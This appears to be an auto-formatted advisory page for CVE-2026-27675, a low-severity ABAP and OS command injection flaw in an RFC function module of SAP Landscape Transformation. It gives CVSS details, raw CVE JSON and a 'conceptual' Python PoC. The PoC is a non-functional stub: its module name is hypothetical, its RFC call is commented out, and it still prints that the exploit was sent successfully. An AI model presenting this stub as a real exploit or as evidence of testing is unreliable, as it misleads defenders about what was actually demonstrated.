Security Vulnerability Report
CVE-2026-27675 CVSS 2.0 LOW

Published: 2026-04-14 00:16:06
Last Modified: 2026-04-17 15:18:17

Description

SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. This leads to a low impact on integrity, while confidentiality and availability are not impacted.

CVSS Details

CVSS Score: 2.0
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Landscape Transformation (for the specific affected versions, refer to SAP Note 3723097)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This is a conceptual PoC for CVE-2026-27675
# Requires a library capable of making SAP RFC calls (e.g., PyRFC)
import sys


def exploit_sap_landscape(target_host, target_sysnr, user, password, client):
    """
    Conceptual PoC to demonstrate ABAP Code Injection via vulnerable RFC module.
    """
    try:
        # Simulate connection to the SAP system
        print(f"[*] Connecting to {target_host} system {client}...")

        # The vulnerable RFC module name (hypothetical based on description)
        rfc_module = "Z_VULNERABLE_LTRANS_FUNC"

        # Malicious payload to inject ABAP code
        # This attempts to execute a system command or modify data
        payload = "WRITE: / 'CVE-2026-27675 Exploit Executed'."

        print(f"[*] Sending payload to {rfc_module}...")
        print(f"[*] Payload: {payload}")

        # In a real scenario, this would trigger the execution
        # result = conn.call(rfc_module, INJECTION_PARAM=payload)

        print("[+] Exploit sent successfully.")
        print("[!] Note: High privileges and User Interaction are required.")
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")


if __name__ == "__main__":
    # Usage: python poc.py <host> <sysnr> <user> <pass> <client>
    # exploit_sap_landscape("10.0.0.1", "00", "ADMIN", "PASSWORD", "000")
    pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27675", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:05.823", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. This leads to a low impact on integrity, while confidentiality and availability are not impacted."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3723097", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}